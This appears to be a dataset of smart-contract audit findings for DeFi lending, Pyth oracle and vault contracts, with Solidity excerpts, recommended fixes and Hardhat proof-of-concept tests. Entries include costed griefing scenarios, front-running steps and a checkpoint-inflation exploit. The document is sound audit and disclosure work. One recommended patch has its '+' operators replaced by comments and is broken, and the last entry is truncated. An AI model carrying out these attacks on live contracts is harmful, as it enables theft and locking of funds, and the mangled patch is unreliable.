DoS of lenders and gas griefing by packing tokenIdToBorrowingKeys arrays
medium
`LiquidityBorrowingManager.borrow()` calls the function `_addKeysAndLoansInfo()`, which adds user keys to the `tokenIdToBorrowingKeys` array of the borrowed-from LP position:\\n```\\n function _addKeysAndLoansInfo(\\n bool update,\\n bytes32 borrowingKey,\\n LoanInfo[] memory sourceLoans\\n ) private {\\n // Get the storage reference to the loans array for the borrowing key\\n LoanInfo[] storage loans = loansInfo[borrowingKey];\\n // Iterate through the sourceLoans array\\n for (uint256 i; i < sourceLoans.length; ) {\\n // Get the current loan from the sourceLoans array\\n LoanInfo memory loan = sourceLoans[i];\\n // Get the storage reference to the tokenIdLoansKeys array for the loan's token ID\\n bytes32[] storage tokenIdLoansKeys = tokenIdToBorrowingKeys[loan.tokenId];\\n // Conditionally add or push the borrowing key to the tokenIdLoansKeys array based on the 'update' flag\\n update\\n ? tokenIdLoansKeys.addKeyIfNotExists(borrowingKey)\\n : tokenIdLoansKeys.push(borrowingKey);\\n // rest of code\\n```\\n\\nA user key is calculated in the `Keys` library like so:\\n```\\n function computeBorrowingKey(\\n address borrower,\\n address saleToken,\\n address holdToken\\n ) internal pure returns (bytes32) {\\n return keccak256(abi.encodePacked(borrower, saleToken, holdToken));\\n }\\n```\\n\\n```\\n function addKeyIfNotExists(bytes32[] storage self, bytes32 key) internal {\\n uint256 length = self.length;\\n for (uint256 i; i < length; ) {\\n if (self.unsafeAccess(i).value == key) {\\n return;\\n }\\n unchecked {\\n ++i;\\n }\\n }\\n self.push(key);\\n }\\n\\n function removeKey(bytes32[] storage self, bytes32 key) internal {\\n uint256 length = self.length;\\n for (uint256 i; i < length; ) {\\n if (self.unsafeAccess(i).value == key) {\\n self.unsafeAccess(i).value = self.unsafeAccess(length - 1).value;\\n self.pop();\\n break;\\n }\\n unchecked {\\n ++i;\\n }\\n }\\n }\\n```\\n\\nLet's give an example to see the potential impact and cost of the attack:\\nAn LP provider authorizes the contract to give loans from their large position. Let's say USDC/WETH pool.\\nThe attacker sees this and takes out minimum borrows of USDC using different addresses to pack the position's `tokenIdToBorrowingKeys` array. In `Constants.sol`, `MINIMUM_BORROWED_AMOUNT = 100000` so the minimum borrow is $0.1 dollars since USDC has 6 decimal places. Add this to the estimated gas cost of the borrow transaction, let's say $3.9 dollars. The cost to add one key to the array is approx. $4. The max block gas limit on ethereum mainnet is `30,000,000`, so divide that by 2000 gas, the approximate gas increase for one key added to the array. The result is 15,000, therefore the attacker can spend 60000 dollars to make any new borrows from the LP position unable to be repaid, transferred, or liquidated. Any new borrow will be stuck in the contract.\\nThe attacker now takes out a high leverage borrow on the LP position, for example $20,000 in collateral for a $1,000,000 borrow. The attacker's total expenditure is now $80,000, and the $1,000,000 from the LP is now locked in the contract for an arbitrary period of time.\\nThe attacker calls `increaseCollateralBalance()` on all of the spam positions. Default daily rate is .1% (max 1%), so over a year the attacker must pay 36.5% of each spam borrow amount to avoid liquidation and shortening of the array. If the gas cost of increasing collateral is $0.5 dollars, and the attacker spends another $0.5 dollars to increase collateral for each spam borrow, then the attacker can spend $1 on each spam borrow and keep them safe from liquidation for over 10 years for a cost of $15,000 dollars. The total attack expenditure is now $95,000. The protocol cannot easily increase the rate to hurt the attacker, because that would increase the rate for all users in the USDC/WETH market. Furthermore, the cost of the attack will not increase that much even if the daily rate is increased to the max of 1%. The attacker does not need to increase the collateral balance of the $1,000,000 borrow since repaying that borrow is DoSed.\\nThe result is that $1,000,000 of the loaner's liquidity is locked in the contract for over 10 years for an attack cost of $95,000.
`tokenIdToBorrowingKeys` tracks borrowing keys and is used in view functions to return info (getLenderCreditsCount() and getLenderCreditsInfo()). This functionality is easier to implement with arrays, but it can be done with mappings to reduce gas costs and prevent gas griefing and DoS attacks. For example the protocol can emit the borrows for all LP tokens and keep track of them offchain, and pass borrow IDs in an array to a view function to look them up in the mapping. Alternatively, OpenZeppelin's EnumerableSet library could be used to replace the array and keep track of all the borrows on-chain.
Array packing causes users to spend more gas on loans of the affected LP token. User transactions may out-of-gas revert due to increased gas costs. An attacker can lock liquidity from LPs in the contract for arbitrary periods of time for asymmetric cost favoring the attacker. The LP will earn very little fees over the period of the DoS.
```\\n function _addKeysAndLoansInfo(\\n bool update,\\n bytes32 borrowingKey,\\n LoanInfo[] memory sourceLoans\\n ) private {\\n // Get the storage reference to the loans array for the borrowing key\\n LoanInfo[] storage loans = loansInfo[borrowingKey];\\n // Iterate through the sourceLoans array\\n for (uint256 i; i < sourceLoans.length; ) {\\n // Get the current loan from the sourceLoans array\\n LoanInfo memory loan = sourceLoans[i];\\n // Get the storage reference to the tokenIdLoansKeys array for the loan's token ID\\n bytes32[] storage tokenIdLoansKeys = tokenIdToBorrowingKeys[loan.tokenId];\\n // Conditionally add or push the borrowing key to the tokenIdLoansKeys array based on the 'update' flag\\n update\\n ? tokenIdLoansKeys.addKeyIfNotExists(borrowingKey)\\n : tokenIdLoansKeys.push(borrowingKey);\\n // rest of code\\n```\\n
Adversary can overwrite function selector in _patchAmountAndCall due to inline assembly lack of overflow protection
medium
`The use of YUL or inline assembly in a solidity smart contract also makes integer overflow/ underflow possible even if the compiler version of solidity is 0.8. In YUL programming language, integer underflow & overflow is possible in the same way as Solidity and it does not check automatically for it as YUL is a low-level language that is mostly used for making the code more optimized, which does this by omitting many opcodes. Because of its low-level nature, YUL does not perform many security checks therefore it is recommended to use as little of it as possible in your smart contracts.`\\nSource\\nInline assembly lacks overflow/underflow protections, which opens the possibility of this exploit.\\nExternalCall.sol#L27-L38\\n```\\n if gt(swapAmountInDataValue, 0) {\\n mstore(add(add(ptr, 0x24), mul(swapAmountInDataIndex, 0x20)), swapAmountInDataValue)\\n }\\n success := call(\\n maxGas,\\n target,\\n 0, //value\\n ptr, //Inputs are stored at location ptr\\n data.length,\\n 0,\\n 0\\n )\\n```\\n\\nIn the code above we see that `swapAmountInDataValue` is stored at `ptr + 36 (0x24) + swapAmountInDataIndex * 32 (0x20)`. The addition of 36 (0x24) in this scenario should prevent the function selector from being overwritten because of the extra 4 bytes (using 36 instead of 32). This is not the case though because `mul(swapAmountInDataIndex, 0x20)` can overflow since it is a uint256. This allows the attacker to target any part of the memory they choose by selectively overflowing to make it write to the desired position.\\nAs shown above, overwriting the function selector is possible although most of the time this value would be a complete nonsense since swapAmountInDataValue is calculated elsewhere and isn't user supplied. This also has a work around. By creating their own token and adding it as LP to a UniV3 pool, swapAmountInDataValue can be carefully manipulated to any value. This allows the attacker to selectively overwrite the function selector with any value they chose. This bypasses function selectors restrictions and opens calls to dangerous functions.
Limit `swapAmountInDataIndex` to a reasonable value such as uint128.max, preventing any overflow.
Attacker can bypass function restrictions and call dangerous/unintended functions
```\\n if gt(swapAmountInDataValue, 0) {\\n mstore(add(add(ptr, 0x24), mul(swapAmountInDataIndex, 0x20)), swapAmountInDataValue)\\n }\\n success := call(\\n maxGas,\\n target,\\n 0, //value\\n ptr, //Inputs are stored at location ptr\\n data.length,\\n 0,\\n 0\\n )\\n```\\n
Blacklisted creditor can block all repayment besides emergency closure
medium
```\\n address creditor = underlyingPositionManager.ownerOf(loan.tokenId);\\n // Increase liquidity and transfer liquidity owner reward\\n _increaseLiquidity(cache.saleToken, cache.holdToken, loan, amount0, amount1);\\n uint256 liquidityOwnerReward = FullMath.mulDiv(\\n params.totalfeesOwed,\\n cache.holdTokenDebt,\\n params.totalBorrowedAmount\\n ) / Constants.COLLATERAL_BALANCE_PRECISION;\\n\\n Vault(VAULT_ADDRESS).transferToken(cache.holdToken, creditor, liquidityOwnerReward);\\n```\\n\\nThe following code is executed for each loan when attempting to repay. Here we see that each creditor is directly transferred their tokens from the vault. If the creditor is blacklisted for holdToken, then the transfer will revert. This will cause all repayments to revert, preventing the user from ever repaying their loan and forcing them to default.
Create an escrow to hold funds in the event that the creditor cannot receive their funds. Implement a try-catch block around the transfer to the creditor. If it fails then send the funds instead to an escrow account, allowing the creditor to claim their tokens later and for the transaction to complete.
Borrowers with blacklisted creditors are forced to default
```\\n address creditor = underlyingPositionManager.ownerOf(loan.tokenId);\\n // Increase liquidity and transfer liquidity owner reward\\n _increaseLiquidity(cache.saleToken, cache.holdToken, loan, amount0, amount1);\\n uint256 liquidityOwnerReward = FullMath.mulDiv(\\n params.totalfeesOwed,\\n cache.holdTokenDebt,\\n params.totalBorrowedAmount\\n ) / Constants.COLLATERAL_BALANCE_PRECISION;\\n\\n Vault(VAULT_ADDRESS).transferToken(cache.holdToken, creditor, liquidityOwnerReward);\\n```\\n
Incorrect calculations of borrowingCollateral leads to DoS for positions in the current tick range due to underflow
medium
This calculation is most likely to underflow\\n```\\nuint256 borrowingCollateral = cache.borrowedAmount - cache.holdTokenBalance;\\n```\\n\\nThe `cache.borrowedAmount` is the calculated amount of holdTokens based on the liquidity of a position. `cache.holdTokenBalance` is the balance of holdTokens queried after liquidity extraction and tokens transferred to the `LiquidityBorrowingManager`. If any amounts of the saleToken are transferred as well, these are swapped to holdTokens and added to `cache.holdTokenBalance`.\\nSo in case when liquidity of a position is in the current tick range, both tokens would be transferred to the contract and saleToken would be swapped for holdToken and then added to `cache.holdTokenBalance`. This would make `cache.holdTokenBalance > cache.borrowedAmount` since `cache.holdTokenBalance == cache.borrowedAmount + amount of sale token swapped` and would make the tx revert due to underflow.
The borrowedAmount should be subtracted from holdTokenBalance\\n```\\nuint256 borrowingCollateral = cache.holdTokenBalance - cache.borrowedAmount;\\n```\\n
Many positions would be unavailable to borrowers. For non-volatile positions like that which provide liquidity to stablecoin pools the DoS could last for very long period. For volatile positions that provide liquidity in a wide range this could also be for more than 1 year.
```\\nuint256 borrowingCollateral = cache.borrowedAmount - cache.holdTokenBalance;\\n```\\n
Wrong `accLoanRatePerSeconds` in `repay()` can lead to underflow
medium
Because the `repay()` function resets the `dailyRateCollateralBalance` to 0 when the lender call didn't fully close the position. We want to be able to compute the missing collateral again.\\nTo do so we substract the percentage of collateral not paid to the `accLoanRatePerSeconds` so on the next call we will be adding extra second of fees that will allow the contract to compute the missing collateral.\\nThe problem lies in the fact that we compute a percentage using the borrowed amount left instead of the initial borrow amount causing the percentage to be higher. In practice this do allows the contract to recompute the missing collateral.\\nBut in the case of the missing `collateralBalance` or `removedAmt` being very high (ex: multiple days not paid or the loan removed was most of the position's liquidity) we might end up with a percentage higher than the `accLoanRatePerSeconds` which will cause an underflow.\\nIn case of an underflow the call will revert and the lender will not be able to get his tokens back.\\nConsider this POC that can be copied and pasted in the test files (replace all tests and just keep the setup & NFT creation):\\n```\\nit("Updated accRate is incorrect", async () => {\\n const amountWBTC = ethers.utils.parseUnits("0.05", 8); //token0\\n let deadline = (await time.latest()) + 60;\\n const minLeverageDesired = 50;\\n const maxCollateralWBTC = amountWBTC.div(minLeverageDesired);\\n\\n const loans = [\\n {\\n liquidity: nftpos[3].liquidity,\\n tokenId: nftpos[3].tokenId,\\n },\\n {\\n liquidity: nftpos[5].liquidity,\\n tokenId: nftpos[5].tokenId,\\n },\\n ];\\n\\n const swapParams: ApproveSwapAndPay.SwapParamsStruct = {\\n swapTarget: constants.AddressZero,\\n swapAmountInDataIndex: 0,\\n maxGasForCall: 0,\\n swapData: swapData,\\n };\\n\\n const borrowParams = {\\n internalSwapPoolfee: 500,\\n saleToken: WETH_ADDRESS,\\n holdToken: WBTC_ADDRESS,\\n minHoldTokenOut: amountWBTC,\\n maxCollateral: maxCollateralWBTC,\\n externalSwap: swapParams,\\n loans: loans,\\n };\\n\\n //borrow tokens\\n await borrowingManager.connect(bob).borrow(borrowParams, deadline);\\n\\n await time.increase(3600 * 72); //72h so 2 days of missing collateral\\n deadline = (await time.latest()) + 60;\\n\\n const borrowingKey = await borrowingManager.userBorrowingKeys(bob.address, 0);\\n\\n let repayParams = {\\n isEmergency: true,\\n internalSwapPoolfee: 0,\\n externalSwap: swapParams,\\n borrowingKey: borrowingKey,\\n swapSlippageBP1000: 0,\\n };\\n\\n const oldBorrowingInfo = await borrowingManager.borrowingsInfo(borrowingKey);\\n const dailyRateCollateral = await borrowingManager.checkDailyRateCollateral(borrowingKey);\\n\\n //Alice emergency repay but it reverts with 2 days of collateral missing\\n await expect(borrowingManager.connect(alice).repay(repayParams, deadline)).to.be.revertedWithPanic();\\n });\\n```\\n
Consider that when a lender do an emergency liquidity restoration they give up on their collateral missing and so use the initial amount in the computation instead of borrowed amount left.\\n```\\nborrowingStorage.accLoanRatePerSeconds =\\n holdTokenRateInfo.accLoanRatePerSeconds -\\n FullMath.mulDiv(\\n uint256(-collateralBalance),\\n Constants.BP,\\n borrowing.borrowedAmount + removedAmt //old amount\\n );\\n```\\n
Medium. Lender might not be able to use `isEmergency` on `repay()` and will have to do a normal liquidation if he want his liquidity back.
```\\nit("Updated accRate is incorrect", async () => {\\n const amountWBTC = ethers.utils.parseUnits("0.05", 8); //token0\\n let deadline = (await time.latest()) + 60;\\n const minLeverageDesired = 50;\\n const maxCollateralWBTC = amountWBTC.div(minLeverageDesired);\\n\\n const loans = [\\n {\\n liquidity: nftpos[3].liquidity,\\n tokenId: nftpos[3].tokenId,\\n },\\n {\\n liquidity: nftpos[5].liquidity,\\n tokenId: nftpos[5].tokenId,\\n },\\n ];\\n\\n const swapParams: ApproveSwapAndPay.SwapParamsStruct = {\\n swapTarget: constants.AddressZero,\\n swapAmountInDataIndex: 0,\\n maxGasForCall: 0,\\n swapData: swapData,\\n };\\n\\n const borrowParams = {\\n internalSwapPoolfee: 500,\\n saleToken: WETH_ADDRESS,\\n holdToken: WBTC_ADDRESS,\\n minHoldTokenOut: amountWBTC,\\n maxCollateral: maxCollateralWBTC,\\n externalSwap: swapParams,\\n loans: loans,\\n };\\n\\n //borrow tokens\\n await borrowingManager.connect(bob).borrow(borrowParams, deadline);\\n\\n await time.increase(3600 * 72); //72h so 2 days of missing collateral\\n deadline = (await time.latest()) + 60;\\n\\n const borrowingKey = await borrowingManager.userBorrowingKeys(bob.address, 0);\\n\\n let repayParams = {\\n isEmergency: true,\\n internalSwapPoolfee: 0,\\n externalSwap: swapParams,\\n borrowingKey: borrowingKey,\\n swapSlippageBP1000: 0,\\n };\\n\\n const oldBorrowingInfo = await borrowingManager.borrowingsInfo(borrowingKey);\\n const dailyRateCollateral = await borrowingManager.checkDailyRateCollateral(borrowingKey);\\n\\n //Alice emergency repay but it reverts with 2 days of collateral missing\\n await expect(borrowingManager.connect(alice).repay(repayParams, deadline)).to.be.revertedWithPanic();\\n });\\n```\\n
Borrower collateral that they are owed can get stuck in Vault and not sent back to them after calling `repay`
medium
First, let's say that a borrower called `borrow` in `LiquidityBorrowingManager`. Then, they call increase `increaseCollateralBalance` with a large collateral amount. A short time later, they decide they want to `repay` so they call `repay`.\\nIn `repay`, we have the following code:\\n```\\n if (\\n collateralBalance > 0 &&\\n (currentFees + borrowing.feesOwed) / Constants.COLLATERAL_BALANCE_PRECISION >\\n Constants.MINIMUM_AMOUNT\\n ) {\\n liquidationBonus +=\\n uint256(collateralBalance) /\\n Constants.COLLATERAL_BALANCE_PRECISION;\\n } else {\\n currentFees = borrowing.dailyRateCollateralBalance;\\n }\\n```\\n\\nNotice that if we have `collateralBalance > 0` BUT `!((currentFees + borrowing.feesOwed) / Constants.COLLATERAL_BALANCE_PRECISION > Constants.MINIMUM_AMOUNT)` (i.e. the first part of the if condition is fine but the second is not. It makes sense the second part is not fine because the borrower is repaying not long after they borrowed, so fees haven't had a long time to accumulate), then we will still go to `currentFees = borrowing.dailyRateCollateralBalance;` but we will not do:\\n```\\n liquidationBonus +=\\n uint256(collateralBalance) /\\n Constants.COLLATERAL_BALANCE_PRECISION;\\n```\\n\\nHowever, later on in the code, we have:\\n```\\n Vault(VAULT_ADDRESS).transferToken(\\n borrowing.holdToken,\\n address(this),\\n borrowing.borrowedAmount + liquidationBonus\\n );\\n```\\n\\nSo, the borrower's collateral will actually not even be sent back to the LiquidityBorrowingManager from the Vault (since we never incremented liquidationBonus). We later do:\\n```\\n _pay(borrowing.holdToken, address(this), msg.sender, holdTokenBalance);\\n _pay(borrowing.saleToken, address(this), msg.sender, saleTokenBalance);\\n```\\n\\nSo clearly the user will not receive their collateral back.
You should separate:\\n```\\n if (\\n collateralBalance > 0 &&\\n (currentFees + borrowing.feesOwed) / Constants.COLLATERAL_BALANCE_PRECISION >\\n Constants.MINIMUM_AMOUNT\\n ) {\\n liquidationBonus +=\\n uint256(collateralBalance) /\\n Constants.COLLATERAL_BALANCE_PRECISION;\\n } else {\\n currentFees = borrowing.dailyRateCollateralBalance;\\n }\\n```\\n\\nInto two separate if statements. One should check if `collateralBalance > 0`, and if so, increment liquidationBonus. The other should check `(currentFees + borrowing.feesOwed) / Constants.COLLATERAL_BALANCE_PRECISION > Constants.MINIMUM_AMOUNT` and if not, set `currentFees = borrowing.dailyRateCollateralBalance;`.
User's collateral will be stuck in Vault when it should be sent back to them. This could be a large amount of funds if for example `increaseCollateralBalance` is called first.
```\\n if (\\n collateralBalance > 0 &&\\n (currentFees + borrowing.feesOwed) / Constants.COLLATERAL_BALANCE_PRECISION >\\n Constants.MINIMUM_AMOUNT\\n ) {\\n liquidationBonus +=\\n uint256(collateralBalance) /\\n Constants.COLLATERAL_BALANCE_PRECISION;\\n } else {\\n currentFees = borrowing.dailyRateCollateralBalance;\\n }\\n```\\n
commitRequested() front-run malicious invalid oralce
medium
Execution of the `commitRequested()` method restricts the `lastCommittedPublishTime` from going backward.\\n```\\n function commitRequested(uint256 versionIndex, bytes calldata updateData)\\n public\\n payable\\n keep(KEEPER_REWARD_PREMIUM, KEEPER_BUFFER, updateData, "")\\n {\\n// rest of code\\n\\n if (pythPrice.publishTime <= lastCommittedPublishTime) revert PythOracleNonIncreasingPublishTimes();\\n lastCommittedPublishTime = pythPrice.publishTime;\\n// rest of code\\n```\\n\\n`commit()` has a similar limitation and can set `lastCommittedPublishTime`.\\n```\\n function commit(uint256 versionIndex, uint256 oracleVersion, bytes calldata updateData) external payable {\\n if (\\n versionList.length > versionIndex && // must be a requested version\\n versionIndex >= nextVersionIndexToCommit && // must be the next (or later) requested version\\n oracleVersion == versionList[versionIndex] // must be the corresponding timestamp\\n ) {\\n commitRequested(versionIndex, updateData);\\n return;\\n }\\n// rest of code\\n if (pythPrice.publishTime <= lastCommittedPublishTime) revert PythOracleNonIncreasingPublishTimes();\\n lastCommittedPublishTime = pythPrice.publishTime;\\n// rest of code.\\n```\\n\\nThis leads to a situation where anyone can front-run `commitRequested()` and use his `updateData` to execute `commit()`. In order to satisfy the `commit()` constraint, we need to pass a `commit()` parameter set as follows\\nversionIndex= nextVersionIndexToCommit\\noracleVersion = versionList[versionIndex] - 1 and oralceVersion > _latestVersion\\npythPrice.publishTime >= versionList[versionIndex] - 1 + MIN_VALID_TIME_AFTER_VERSION\\nThis way `lastCommittedPublishTime` will be modified, causing `commitRequested()` to execute with `revert PythOracleNonIncreasingPublishTimes`\\nExample: Given: nextVersionIndexToCommit = 10 versionList[10] = 200\\n_latestVersion = 100\\nwhen:\\nkeeper exexute commitRequested(versionIndex = 10 , VAA{ publishTime = 205})\\nfront-run execute `commit(versionIndex = 10 , oracleVersion = 200-1 , VAA{ publishTime = 205})\\nversionIndex= nextVersionIndexToCommit (pass)\\noracleVersion = versionList[versionIndex] - 1 and oralceVersion > _latestVersion (pass)\\npythPrice.publishTime >= versionList[versionIndex] - 1 + MIN_VALID_TIME_AFTER_VERSION (pass)\\nBy the time the `keeper` submits the next VVA, the price may have passed its expiration date
check `pythPrice` whether valid for `nextVersionIndexToCommit`\\n```\\n function commit(uint256 versionIndex, uint256 oracleVersion, bytes calldata updateData) external payable {\\n // Must be before the next requested version to commit, if it exists\\n // Otherwise, try to commit it as the next request version to commit\\n if (\\n versionList.length > versionIndex && // must be a requested version\\n versionIndex >= nextVersionIndexToCommit && // must be the next (or later) requested version\\n oracleVersion == versionList[versionIndex] // must be the corresponding timestamp\\n ) {\\n commitRequested(versionIndex, updateData);\\n return;\\n }\\n\\n PythStructs.Price memory pythPrice = _validateAndGetPrice(oracleVersion, updateData);\\n\\n // Price must be more recent than that of the most recently committed version\\n if (pythPrice.publishTime <= lastCommittedPublishTime) revert PythOracleNonIncreasingPublishTimes();\\n lastCommittedPublishTime = pythPrice.publishTime;\\n\\n // Oracle version must be more recent than that of the most recently committed version\\n uint256 minVersion = _latestVersion;\\n uint256 maxVersion = versionList.length > versionIndex ? versionList[versionIndex] : current();\\n\\n if (versionIndex < nextVersionIndexToCommit) revert PythOracleVersionIndexTooLowError();\\n if (versionIndex > nextVersionIndexToCommit && block.timestamp <= versionList[versionIndex - 1] // Add the line below\\n GRACE_PERIOD)\\n revert PythOracleGracePeriodHasNotExpiredError();\\n if (oracleVersion <= minVersion || oracleVersion >= maxVersion) revert PythOracleVersionOutsideRangeError();\\n// Add the line below\\n if (nextVersionIndexToCommit < versionList.length) {\\n// Add the line below\\n if (\\n// Add the line below\\n pythPrice.publishTime >= versionList[nextVersionIndexToCommit] // Add the line below\\n MIN_VALID_TIME_AFTER_VERSION &&\\n// Add the line below\\n pythPrice.publishTime <= versionList[nextVersionIndexToCommit] // Add the line below\\n MAX_VALID_TIME_AFTER_VERSION\\n// Add the line below\\n ) revert PythOracleUpdateValidForPreviousVersionError();\\n// Add the line below\\n }\\n\\n\\n _recordPrice(oracleVersion, pythPrice);\\n nextVersionIndexToCommit = versionIndex;\\n _latestVersion = oracleVersion;\\n }\\n```\\n
If the user can control the oralce invalidation, it can lead to many problems e.g. invalidating `oracle` to one's own detriment, not having to take losses Maliciously destroying other people's profits, etc.
```\\n function commitRequested(uint256 versionIndex, bytes calldata updateData)\\n public\\n payable\\n keep(KEEPER_REWARD_PREMIUM, KEEPER_BUFFER, updateData, "")\\n {\\n// rest of code\\n\\n if (pythPrice.publishTime <= lastCommittedPublishTime) revert PythOracleNonIncreasingPublishTimes();\\n lastCommittedPublishTime = pythPrice.publishTime;\\n// rest of code\\n```\\n
`Vault.update(anyUser,0,0,0)` can be called for free to increase `checkpoint.count` and pay smaller keeper fee than necessary
medium
`Vault._update(user, 0, 0, 0)` will pass all invariants checks:\\n```\\n// invariant\\n// @audit operator - pass\\nif (msg.sender != account && !IVaultFactory(address(factory())).operators(account, msg.sender))\\n revert VaultNotOperatorError();\\n// @audit 0,0,0 is single-sided - pass\\nif (!depositAssets.add(redeemShares).add(claimAssets).eq(depositAssets.max(redeemShares).max(claimAssets)))\\n revert VaultNotSingleSidedError();\\n// @audit depositAssets == 0 - pass\\nif (depositAssets.gt(_maxDeposit(context)))\\n revert VaultDepositLimitExceededError();\\n// @audit redeemShares == 0 - pass\\nif (redeemShares.gt(_maxRedeem(context)))\\n revert VaultRedemptionLimitExceededError();\\n// @audit depositAssets == 0 - pass\\nif (!depositAssets.isZero() && depositAssets.lt(context.settlementFee))\\n revert VaultInsufficientMinimumError();\\n// @audit redeemShares == 0 - pass\\nif (!redeemShares.isZero() && context.latestCheckpoint.toAssets(redeemShares, context.settlementFee).isZero())\\n revert VaultInsufficientMinimumError();\\n// @audit since this will be called by **different** users in the same epoch, this will also pass\\nif (context.local.current != context.local.latest) revert VaultExistingOrderError();\\n```\\n\\nIt then calculates amount to claim by calling _socialize:\\n```\\n// asses socialization and settlement fee\\nUFixed6 claimAmount = _socialize(context, depositAssets, redeemShares, claimAssets);\\n// rest of code\\nfunction _socialize(\\n Context memory context,\\n UFixed6 depositAssets,\\n UFixed6 redeemShares,\\n UFixed6 claimAssets\\n) private view returns (UFixed6 claimAmount) {\\n // @audit global assets must be 0 to make (0,0,0) pass this function\\n if (context.global.assets.isZero()) return UFixed6Lib.ZERO;\\n UFixed6 totalCollateral = UFixed6Lib.from(_collateral(context).max(Fixed6Lib.ZERO));\\n claimAmount = claimAssets.muldiv(totalCollateral.min(context.global.assets), context.global.assets);\\n\\n // @audit for (0,0,0) this will revert (underflow)\\n if (depositAssets.isZero() && redeemShares.isZero()) claimAmount = claimAmount.sub(context.settlementFee);\\n}\\n```\\n\\n`_socialize` will immediately return 0 if `context.global.assets == 0`. If `context.global.assets > 0`, then this function will revert in the last line due to underflow (trying to subtract `settlementFee` from 0 claimAmount)\\nThis is the condition for this issue to happen: global assets must be 0. Global assets are the amounts redeemed but not yet claimed by users. So this can reasonably happen in the first days of the vault life, when users mostly only deposit, or claim everything they withdraw.\\nOnce this function passes, the following lines increase checkpoint.count:\\n```\\n// update positions\\ncontext.global.update(context.currentId, claimAssets, redeemShares, depositAssets, redeemShares);\\ncontext.local.update(context.currentId, claimAssets, redeemShares, depositAssets, redeemShares);\\ncontext.currentCheckpoint.update(depositAssets, redeemShares);\\n// rest of code\\n// Checkpoint library:\\n// rest of code\\nfunction update(Checkpoint memory self, UFixed6 deposit, UFixed6 redemption) internal pure {\\n (self.deposit, self.redemption) = (self.deposit.add(deposit), self.redemption.add(redemption));\\n self.count++;\\n}\\n```\\n\\nThe rest of the function executes normally.\\nDuring position settlement, pending user deposits and redeems are reduced by the keeper fees / checkpoint.count:\\n```\\n// Account library:\\n// rest of code\\nfunction processLocal(\\n Account memory self,\\n uint256 latestId,\\n Checkpoint memory checkpoint,\\n UFixed6 deposit,\\n UFixed6 redemption\\n) internal pure {\\n self.latest = latestId;\\n (self.assets, self.shares) = (\\n self.assets.add(checkpoint.toAssetsLocal(redemption)),\\n self.shares.add(checkpoint.toSharesLocal(deposit))\\n );\\n (self.deposit, self.redemption) = (self.deposit.sub(deposit), self.redemption.sub(redemption));\\n}\\n// rest of code\\n// Checkpoint library\\n// toAssetsLocal / toSharesLocal calls _withoutKeeperLocal to calculate keeper fees:\\n// rest of code\\n function _withoutKeeperLocal(Checkpoint memory self, UFixed6 amount) private pure returns (UFixed6) {\\n UFixed6 keeperPer = self.count == 0 ? UFixed6Lib.ZERO : self.keeper.div(UFixed6Lib.from(self.count));\\n return _withoutKeeper(amount, keeperPer);\\n }\\n```\\n\\nAlso notice that in `processLocal` the only thing which keeper fees influence are deposits and redemptions, but not claims.\\nThe scenario above is demonstrated in the test, add this to Vault.test.ts:\\n```\\nit('inflate checkpoint count', async () => {\\n const settlementFee = parse6decimal('10.00')\\n const marketParameter = { // rest of code(await market.parameter()) }\\n marketParameter.settlementFee = settlementFee\\n await market.connect(owner).updateParameter(marketParameter)\\n const btcMarketParameter = { // rest of code(await btcMarket.parameter()) }\\n btcMarketParameter.settlementFee = settlementFee\\n await btcMarket.connect(owner).updateParameter(btcMarketParameter)\\n\\n const deposit = parse6decimal('10000')\\n await vault.connect(user).update(user.address, deposit, 0, 0)\\n await updateOracle()\\n await vault.settle(user.address)\\n\\n const deposit2 = parse6decimal('10000')\\n await vault.connect(user2).update(user2.address, deposit2, 0, 0)\\n\\n // inflate checkpoint.count\\n await vault.connect(btcUser1).update(btcUser1.address, 0, 0, 0)\\n await vault.connect(btcUser2).update(btcUser2.address, 0, 0, 0)\\n\\n await updateOracle()\\n await vault.connect(user2).settle(user2.address)\\n\\n const checkpoint2 = await vault.checkpoints(3)\\n console.log("checkpoint count = " + checkpoint2.count)\\n\\n var account = await vault.accounts(user.address);\\n var assets = await vault.convertToAssets(account.shares);\\n console.log("User shares:" + account.shares + " assets: " + assets);\\n var account = await vault.accounts(user2.address);\\n var assets = await vault.convertToAssets(account.shares);\\n console.log("User2 shares:" + account.shares + " assets: " + assets);\\n})\\n```\\n\\nConsole output:\\n```\\ncheckpoint count = 3\\nUser shares:10000000000 assets: 9990218973\\nUser2 shares:10013140463 assets: 10003346584\\n```\\n\\nSo the user2 inflates his deposited amounts by paying smaller keeper fee.\\nIf 2 lines which inflate checkpoint count (after corresponding comment) are deleted, then the output is:\\n```\\ncheckpoint count = 1\\nUser shares:10000000000 assets: 9990218973\\nUser2 shares:9999780702 assets: 9989999890\\n```\\n\\nSo if not inflated, user2 pays correct amount and has roughly the same assets as user1 after his deposit.
Consider reverting (0,0,0) vault updates, or maybe redirecting to `settle` in this case. Additionally, consider updating checkpoint only if `depositAssets` or `redeemShares` are not zero:\\n```\\nif (!depositAssets.isZero() || !redeemShares.isZero())\\n context.currentCheckpoint.update(depositAssets, redeemShares);\\n```\\n
Malicious vault user can inflate `checkpoint.count` to pay much smaller keeper fee than they should at the expense of the other vault users.
```\\n// invariant\\n// @audit operator - pass\\nif (msg.sender != account && !IVaultFactory(address(factory())).operators(account, msg.sender))\\n revert VaultNotOperatorError();\\n// @audit 0,0,0 is single-sided - pass\\nif (!depositAssets.add(redeemShares).add(claimAssets).eq(depositAssets.max(redeemShares).max(claimAssets)))\\n revert VaultNotSingleSidedError();\\n// @audit depositAssets == 0 - pass\\nif (depositAssets.gt(_maxDeposit(context)))\\n revert VaultDepositLimitExceededError();\\n// @audit redeemShares == 0 - pass\\nif (redeemShares.gt(_maxRedeem(context)))\\n revert VaultRedemptionLimitExceededError();\\n// @audit depositAssets == 0 - pass\\nif (!depositAssets.isZero() && depositAssets.lt(context.settlementFee))\\n revert VaultInsufficientMinimumError();\\n// @audit redeemShares == 0 - pass\\nif (!redeemShares.isZero() && context.latestCheckpoint.toAssets(redeemShares, context.settlementFee).isZero())\\n revert VaultInsufficientMinimumError();\\n// @audit since this will be called by **different** users in the same epoch, this will also pass\\nif (context.local.current != context.local.latest) revert VaultExistingOrderError();\\n```\\n
MultiInvoker liquidation action will revert most of the time due to incorrect closable amount initialization
medium
